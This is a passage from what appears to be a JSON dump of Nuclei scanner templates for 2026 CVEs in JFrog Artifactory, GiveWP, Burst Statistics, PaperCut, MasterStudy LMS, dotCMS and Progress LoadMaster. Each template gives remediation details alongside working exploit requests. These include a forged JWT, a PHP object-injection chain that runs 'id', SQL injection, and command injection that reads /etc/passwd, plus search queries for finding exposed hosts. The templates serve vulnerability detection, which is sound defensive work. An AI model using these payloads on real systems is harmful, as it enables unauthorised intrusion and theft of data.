490a004630440220389f8545e429ad2ed936d627008ca6e485a58180c358670c49ad248fd714949702206bdcefec195e199b1950c251830d7b727698ffea8840778ca371c5c3654bdd80:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-8236.yaml","vuln_id":"cve-2026-8236"},{"raw":"id: CVE-2026-82329\n\ninfo:\n  name: JFrog Artifactory Access Blank Join Key Authentication Bypass\n  author: johnk3r,pruva\n  severity: critical\n  description: |\n    JFrog Artifactory contains an authentication weakness that, under default configuration, may allow an unauthenticated attacker with network access to obtain administrative privileges.\n  impact: |\n    Unauthenticated attackers can gain administrative privileges, leading to full system control.\n  remediation: |\n    Update to the latest version and ensure secure configuration.\n  reference:\n    - https://jfrog.com/help/r/jfrog-release-information/artifactory-security-fixes\n    - https://www.pruva.dev/reproductions/REPRO-2026-00341\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-82329\n    epss-score: 0.07666\n    epss-percentile: 0.94315\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: title:\"JFrog\"\n  tags: cve,cve2026,jfrog,auth-bypass,vkev,kev\n\nvariables:\n  service_id: \"jfrt@cve202682329nuclei{{rand_text_alpha(10)}}\"\n  node_id: \"cve202682329node{{rand_text_alpha(10)}}\"\n  jwt_claims: '{\"service_id\":\"{{service_id}}\",\"node_id\":\"{{node_id}}\",\"skip_node_registration\":true,\"iat\":{{unix_time()}}000}'\n  forged_jwt: '{{generate_jwt(jwt_claims,\"HS256\",\"                                \")}}'\n\nhttp:\n  - raw:\n      - |\n        POST /access/api/v1/registry/join HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/plain\n        User-Agent: JFrogArtifactory/7.146.25\n        Accept: */*\n        Connection: close\n\n        {{forged_jwt}}\n\n    redirects: false\n    max-redirects: 0\n\n    matchers-condition: and\n\n    matchers:\n      - type: status\n        status:\n          - 201\n\n      - type: word\n        part: body\n        words:\n          - '\"token\"'\n# digest: 4a0a004730450220178638ce610d2980fc2109e4f0870cc52c1f58119104a5fc6c10f16daa226893022100e78b42f5dd97c8b95f8b14ec27cc513b33991661564cc716698ac9ee89d1860c:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-82329.yaml","vuln_id":"cve-2026-82329"},{"raw":"id: CVE-2026-82222\n\ninfo:\n  name: GiveWP <= 4.16.7.1 - Remote Code Execution\n  author: 0x_Akoko,pdteam\n  severity: critical\n  description: |\n    GiveWP <= 4.16.7.1 contains an insecure deserialization vulnerability caused by deserialization of untrusted data, letting attackers perform object injection remotely, exploit requires crafted input\n  impact: |\n    Attackers can perform object injection leading to potential code execution or application logic manipulation.\n  remediation: |\n    Update to the latest version beyond 4.16.7.1.\n  reference:\n    - https://patchstack.com/articles/unauthenticated-php-object-injection-to-remote-code-execution-on-givewp/\n    - https://www.cve.org/CVERecord?id=CVE-2026-82222\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-82222\n    epss-score: 0.01547\n    epss-percentile: 0.73908\n    cwe-id: CWE-502\n  metadata:\n    max-request: 7\n    verified: true\n    vendor: givewp\n    product: givewp\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/give/\"\n    fofa-query: body=\"/wp-content/plugins/give/\"\n  tags: cve,cve2026,wordpress,wp-plugin,givewp,rce,deserialization,intrusive,vkev\n\nvariables:\n  cmd: \"id\"\n  cmd_len: \"{{len(cmd)}}\"\n\nflow: |\n  var chars = \"acfhjnprx\";\n  var u = \"give\";\n  var e = \"give\";\n  var p = \"P0c\";\n  for (var i = 0; i < 8; i++) u += chars.charAt(Math.floor(Math.random() * chars.length));\n  for (var i = 0; i < 8; i++) e += chars.charAt(Math.floor(Math.random() * chars.length));\n  for (var i = 0; i < 6; i++) p += chars.charAt(Math.floor(Math.random() * chars.length));\n  e += \"@example.com\";\n  p += \"Aa1!\";\n  set(\"username\", u);\n  set(\"email\", e);\n  set(\"password\", p);\n  http(1);\n  if (!template[\"form_id\"]) set(\"form_id\", \"1\");\n  if (http(2)) {\n    http(3);\n    if (http(4)) {\n      http(5);\n      if (!template[\"form_nonce\"]) set(\"form_nonce\", \"no-hash\");\n      http(6);\n      http(7);\n    }\n  }\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/wp/v2/give_forms HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: form_id\n        part: body\n        group: 1\n        regex:\n          - '\"id\"\\s*:\\s*(\\d+)'\n        internal: true\n\n  - raw:\n      - |\n        POST / HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        give_action=user_register&give_register_submit=1&give_user_login={{username}}&give_user_email={{email}}&give_user_pass={{password}}&give_user_pass2={{password}}&give_redirect={{RootURL}}/\n\n    cookie-reuse: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-admin/profile.php HTTP/1.1\n        Host: {{Hostname}}\n\n    cookie-reuse: true\n    redirects: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"profile.php\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: profile_nonce\n        part: body\n        group: 1\n        regex:\n          - 'name=\"_wpnonce\"[^>]+value=\"([^\"]+)\"'\n        internal: true\n\n      - type: regex\n        name: user_id\n        part: body\n        group: 1\n        regex:\n          - 'name=\"user_id\"[^>]+value=\"([0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/profile.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        _wpnonce={{profile_nonce}}&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id={{user_id}}&action=update&user_id={{user_id}}&first_name=Test&last_name=O%3A5%3A%22TCPDF%22%3A2%3A%7Bs%3A7%3A%22file_id%22%3Bs%3A1%3A%22x%22%3Bs%3A9%3A%22imagekeys%22%3BO%3A61%3A%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CSymfony%5C%5C%5C%5CComponent%5C%5C%5C%5CHttpFoundation%5C%5C%5C%5CSession%5C%5C%5C%5CSession%22%3A2%3A%7Bs%3A7%3A%22storage%22%3BO%3A36%3A%22Give%5C%5C%5C%5CTestData%5C%5C%5C%5CFactories%5C%5C%5C%5CDonorFactory%22%3A1%3A%7Bs%3A15%3A%22loadedProviders%22%3Ba%3A1%3A%7Bs%3A6%3A%22getBag%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A13%3A%22attributeName%22%3Bs%3A{{cmd_len}}%3A%22{{url_encode(cmd)}}%22%3B%7D%7D&nickname={{username}}&display_name={{username}}&email={{email}}&url=&description=&pass1=&pass2=&user_login={{username}}\n\n    cookie-reuse: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=give_donation_form_nonce&give_form_id={{form_id}}\n\n    cookie-reuse: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: form_nonce\n        part: body\n        group: 1\n        regex:\n          - '\"data\"\\s*:\\s*\"([a-f0-9]{8,12})\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=give_process_donation&give-form-id={{form_id}}&give-form-hash={{form_nonce}}&give-amount=25.00&give-gateway=manual&give-price-id=0&give_first=Test&give_email={{email}}&give-form-title=PoC&give-current-url={{RootURL}}/\n\n    cookie-reuse: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302 || status_code == 500'\n        internal: true\n\n  - raw:\n      - |\n        GET /?give_action=view_receipt HTTP/1.1\n        Host: {{Hostname}}\n\n    cookie-reuse: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 500'\n          - 'regex(\"uid=\\\\d+\\\\([^\\\\)]+\\\\)\\\\s+gid=\\\\d+\\\\([^\\\\)]+\\\\)\", body)'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: rce_output\n        group: 0\n        regex:\n          - 'uid=\\d+\\([^\\)]+\\)\\s+gid=\\d+\\([^\\)]+\\)'\n# digest: 4a0a0047304502201ed23c0aa8965ab1e056b59c40c5d1565c34bd461d2857e6cdc8e11eef2a43ad022100ee506c8d93f26e44f74bc131b412b859d8c7efa4b80c95b75767f48fa289c3a5:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-82222.yaml","vuln_id":"cve-2026-82222"},{"raw":"id: CVE-2026-8181\n\ninfo:\n  name: WordPress Burst Statistics 3.4.0-3.4.1.1 - Authentication Bypass\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Burst Statistics – Privacy-Friendly WordPress Analytics plugin 3.4.0 to 3.4.1.1 contains an authentication bypass caused by incorrect return-value handling in is_mainwp_authenticated() function, letting unauthenticated attackers impersonate administrators, exploit requires knowledge of an administrator username.\n  impact: |\n    Unauthenticated attackers can impersonate administrators, leading to privilege escalation and full control over the application.\n  remediation: |\n    Update to a version later than 3.4.1.1 or the latest available version.\n  reference:\n    - https://github.com/murrez/CVE-2026-8181\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8181\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-8181\n    epss-score: 0.14608\n    epss-percentile: 0.96494\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: really-simple-plugins\n    product: burst-statistics\n    publicwww-query: \"/wp-content/plugins/burst-statistics/\"\n  tags: cve,cve2026,wp,wp-plugin,wordpress,burst-statistics,auth-bypass,unauth,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/burst-statistics/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(to_lower(body), \"burst statistics\")'\n          - 'compare_versions(version, \">= 3.4.0\", \"<= 3.4.1.1\")'\n        internal: true\n        condition: and\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([\\w.]+)'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/wp/v2/users\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"slug\\\"\")'\n        internal: true\n        condition: and\n\n    extractors:\n      - type: regex\n        name: admin_user\n        part: body\n        group: 1\n        regex:\n          - '\"slug\":\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-json/wp/v2/users/me?context=edit HTTP/1.1\n        Host: {{Hostname}}\n        X-BURSTMAINWP: 1\n        Authorization: Basic {{base64(admin_user + ':x')}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"id\\\"\", \"\\\"email\\\"\", \"\\\"roles\\\"\", \"\\\"administrator\\\"\")'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n\n    extractors:\n      - type: json\n        part: body\n        json:\n          - '.email'\n# digest: 4b0a00483046022100e68826b3932a95f8bcbe443ca75fe4535b589c1787aa1fadbf9de35b9744b53a0221009cba4f2ea5ed79873733d4d090bb00f5c861f1db78c6d4df340d99b0b7621572:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-8181.yaml","vuln_id":"cve-2026-8181"},{"raw":"id: CVE-2026-81578\n\ninfo:\n  name: PaperCut NG/MF <=26.0.4 - Unauthenticated ConfigEditor Access via Tapestry Complex-Direct\n  author: darses,DhiyaneshDk\n  severity: critical\n  description: |\n    PaperCut NG and PaperCut MF versions 24.x through 26.x contain an authentication bypass vulnerability in the Apache Tapestry-based web interface. By crafting a complex-direct service request that specifies the public Home page as the render target while invoking the privileged ConfigEditor page's form listeners, an unauthenticated remote attacker can search and modify server configuration options. PaperCut's access control validates the render page but fails to validate the component page, allowing full configuration access without authentication. When chained with CVE-2026-82078, an attacker reconfigures external user lookup to use a malicious JDBC URL whose initialization SQL evaluates arbitrary Groovy code, achieving unauthenticated remote code execution. This vulnerability is actively exploited in the wild.\n  impact: |\n    An unauthenticated remote attacker can bypass authentication to access the ConfigEditor administrative interface and modify arbitrary system configurations including database driver settings. When chained with CVE-2026-82078, full remote code execution is achievable with SYSTEM privileges on Windows or papercut user privileges on Linux.\n  remediation: |\n    Update to PaperCut NG/MF version 26.0.5, 25.0.13, or 24.1.10 or later. As an immediate mitigation, restrict network access to the PaperCut web management interface (default ports 9191 and 9192) to trusted administrative IPs only.\n  reference:\n    - https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/\n    - https://www.rapid7.com/blog/post/etr-papercut-ng-mf-critical-zero-day-exploited-in-the-wild/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-81578\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-82078\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-81578\n    epss-score: 0.0329\n    epss-percentile: 0.87936\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: papercut\n    product: papercut_ng,papercut_mf\n    shodan-query: http.title:\"PaperCut\"\n    fofa-query: title=\"PaperCut\"\n  tags: cve,cve2026,papercut,auth-bypass,rce,unauth,tapestry,kev,vkev\n\nvariables:\n  rand: \"{{rand_text_alpha(8)}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /app?service=page/Error HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"<!-- Page: Error -->\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /app HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'contains(body, \"<!-- Page: Home -->\")'\n          - 'status_code == 200'\n        condition: and\n\n  - raw:\n      - |\n        POST /app?service=direct/{{rand}}/Home/ConfigEditor/quickFindForm HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Origin: {{RootURL}}\n        Referer: {{RootURL}}/app\n\n        sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=server.name&doQuickFind=Go\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"<!-- Page: Home -->\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022100aedf5b644aca651051e64271735a3e57d85d9c8c7c7e6f244059402603fd10c202206fdc12bbd0b79d215b37af2d0e1f050aab8dc88cc116cde4cedaaba8be529113:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-81578.yaml","vuln_id":"cve-2026-81578"},{"raw":"id: CVE-2026-81199\n\ninfo:\n  name: MasterStudy LMS < 3.7.46 - Unauthenticated Student Statistics Disclosure\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    MasterStudy LMS WordPress plugin before 3.7.46 contains an information disclosure vulnerability caused by missing authorization checks in student learning statistics, letting unauthenticated attackers access sensitive user course data, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can access sensitive student learning statistics of any registered user, leading to information disclosure.\n  remediation: |\n    Update to version 3.7.46 or later.\n  reference:\n    - https://wpscan.com/vulnerability/8dd53f85-5d1b-4e0b-a0f5-8c65d89cefb5/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-81199\n  classification:\n    cve-id: CVE-2026-81199\n    epss-score: 0.00302\n    epss-percentile: 0.23128\n    cwe-id: CWE-200\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: stylemix\n    product: masterstudy-lms\n    shodan-query: http.html:\"/wp-content/plugins/masterstudy-lms-learning-management-system/\"\n    fofa-query: body=\"masterstudy-lms-learning-management-system\"\n  tags: cve,cve2026,wordpress,wp-plugin,masterstudy-lms,rest,disclosure,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"masterstudy-lms\")'\n          - 'len(nonce) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'rest_nonce\"?\\s*:\\s*\"?([a-f0-9]{10})'\n          - '\"nonce\"\\s*:\\s*\"([a-f0-9]{10})\"'\n\n  - raw:\n      - |\n        GET /?rest_route=/masterstudy-lms/v2/student/stats/1 HTTP/1.1\n        Host: {{Hostname}}\n        X-WP-Nonce: {{nonce}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"courses_statuses\\\":\", \"\\\"total_points\\\":\", \"\\\"total_assignments\\\":\")'\n          - '!contains_any(body, \"forbidden\", \"rest_nonce_missed\")'\n        condition: and\n# digest: 490a0046304402203f30f20fa658c398c4962f70fbb45825c8d24505cff78f42483c42af625b8fa00220082f3537c0d73eb1ca829df0f4c6e81b4f9400a2303c286a1098c1811f15f61d:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-81199.yaml","vuln_id":"cve-2026-81199"},{"raw":"id: CVE-2026-8054\n\ninfo:\n  name: dotCMS Core Publish Audit API - Unauthenticated SQL Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    dotCMS Core 25.11.04-1 through 26.04.28-02 contains an SQL injection caused by unsanitized input in Publish Audit API endpoints (/api/auditPublishing/get and /api/auditPublishing/getAll), letting remote unauthenticated attackers read, modify, or destroy arbitrary database content, exploit requires no authentication.\n  impact: |\n    Remote attackers can read, modify, or destroy arbitrary database content, potentially compromising the entire database.\n  remediation: |\n    Upgrade to dotCMS Core 26.04.28-03 or later.\n  reference:\n    - https://github.com/advisories/GHSA-jpx3-25r2-jq5g\n    - https://github.com/dotCMS/core/pull/35553\n    - https://dev.dotcms.com/docs/known-security-issues?issueNumber=SI-75\n  metadata:\n    max-request: 2\n    vendor: dotcms\n    product: dotcms\n    shodan-query: http.title:\"dotcms\"\n    fofa-query: title=\"dotcms\"\n    google-query: intitle:\"dotcms\"\n  tags: cve,cve2026,dotcms,sqli,unauth,time-based,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/auditPublishing/getAll HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        [\"x' || (SELECT CASE WHEN 1=2 THEN pg_sleep(0)::text ELSE '' END) || '\"]\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(content_type, 'application/json')\"\n          - \"contains(body, '[]')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 15s\n        POST /api/auditPublishing/getAll HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n\n        [\"x' || (SELECT CASE WHEN 1=1 THEN pg_sleep(5)::text ELSE '' END) || '\"]\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration>=5\"\n          - \"status_code == 200\"\n          - \"contains(content_type, 'application/json')\"\n          - \"contains(body, '[]')\"\n        condition: and\n# digest: 4a0a0047304502206353978d3f1babdbe78c719242ffd86344e79159433b089fabad34084f1ac8bc022100a3ddda615cad914cbb269bca5694a0aa29e5be38745a7d7d8c50b81e2f9a5f59:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-8054.yaml","vuln_id":"cve-2026-8054"},{"raw":"id: CVE-2026-8037\n\ninfo:\n  name: Progress ADC LoadMaster - Command Injection\n  author: watchtowr,DhiyaneshDk\n  severity: critical\n  description: |\n    OS Command Injection Remote Code Execution Vulnerability in API in Progress ADC Products allows an un-authenticated attacker to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in multiple command endpoints\n  impact: |\n    Unauthenticated attackers can execute arbitrary commands on the LoadMaster appliance, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of Progress ADC LoadMaster.\n  reference:\n    - https://community.progress.com/s/article/LoadMaster-Critical-Security-Bulletin-June-2026-CVE-2026-8037-CVE-2026-33691\n    - https://labs.watchtowr.com/enterprise-tech-in-shell-out-progress-kemp-loadmaster-uninitialized-heap-to-pre-auth-rce-cve-2026-8037/\n  metadata:\n    verified: false\n    fofa-query: body=\"Progress\" && icon_hash==\"-2107233094\"\n    max-request: 1\n  tags: cve,cve2026,progress,loadmaster,rce,vkev,kev\n\nhttp:\n  - raw:\n      - |\n        POST /accessv2 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: */*\n\n        {\"cmd\": \"getall\", \"apiuser\": \"''''\", \"apipass\": \"BBBBB\", \"g0\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g1\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g2\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g3\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g4\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g5\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g6\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g7\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g8\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g9\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g10\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g11\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g12\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g13\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g14\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g15\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g16\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g17\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g18\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g19\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g20\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g21\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g22\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g23\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g24\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g25\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g26\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g27\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g28\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g29\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g30\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g31\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g32\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g33\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g34\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g35\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g36\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g37\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g38\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g39\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g40\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g41\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g42\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g43\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g44\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g45\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g46\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g47\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g48\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g49\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g50\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g51\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g52\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g53\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g54\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g55\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g56\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g57\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g58\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g59\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\", \"g60\": \"AAAAAAAAAAAAAAAA'; cat /etc/passwd #\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: response\n        words:\n          - \"root:x:0:0:\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100af4434f82e456243dc73c78eaea42a9334c2c9dc05fe0a035965e3f21a7b2639022100c51c9214d1c025f74fb571fc2b566f9ad3871b03d574a21116340e9bc947baf0:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-8037.yaml","vuln_id":"cve-2026-8037"},{"raw":"id: CVE-2026-80099\n\ninfo:\n  name: Newfold WordPress Plugins - Unauthenticated Admin Bypass via Empty HMAC Secret\n  author: ritikchaddha\n  severity: high\n  description: |\n    Newfold Digital WordPress plugins bundling wp-module-data <=2.9.4 allow unauthenticated attackers to forge a valid Bearer token and gain WordPress administrator access. The authenticate() method (hooked on rest_authentication_errors) computes: token = sha256(sha256(wp_json_encode({method,url,body,timestamp})) + sha256(strrev(get_auth_token()))) On sites not connected to Hiive, get_auth_token() returns false; PHP coerces strrev(false) to strrev('') = '', so the HMAC salt collapses to the public constant sha256('') = e3b0c44... All other inputs are attacker-controlled, enabling offline token forgery without any secret knowledge.\n  impact: |\n    Unauthenticated attackers gain full WordPress administrator access via forged Bearer token, enabling arbitrary REST API operations — user creation, plugin upload, theme editor write, and persistent backdoor installation (complete site takeover / RCE).\n  remediation: |\n    Update to patched versions: Bluehost >=4.19.1, HostGator >=3.2.1, Web >=2.3.6, Crazy Domains >=2.5.3, or update wp-module-data to >=2.9.8.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/3ee369c0-0d7c-4142-b3ba-a518288647ba\n    - https://github.com/Wayang1337/CVE-2026-80099\n    - https://plugins.trac.wordpress.org/browser/wp-module-data/trunk/includes/Data.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-80099\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-80099\n    cwe-id: CWE-287\n    epss-score: 0.00508\n    epss-percentile: 0.42408\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: newfold\n    product: wp-module-data,bluehost-wordpress-plugin,hostgator,wp-plugin-web,crazy-domains\n    fofa-query: body=\"/wp-content/plugins/wp-plugin-crazy-domains\"\n    shodan-query: html:\"/wp-content/plugins/wp-plugin-crazy-domains\"\n  tags: cve,cve2026,wordpress,auth-bypass,newfold,bluehost,hostgator,wp-plugin,vkev\n\nflow: http(1) && http(2)\n\nvariables:\n  ts: \"0\"\n  esc_base: \"{{replace(BaseURL, '/', '\\\\\\\\/')}}\"\n  esc_path: \"\\\\/wp-json\\\\/wp\\\\/v2\\\\/users\\\\/me?context=edit\"\n  esc_url: \"{{esc_base + esc_path}}\"\n  empty_salt: \"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\n  data_hash: 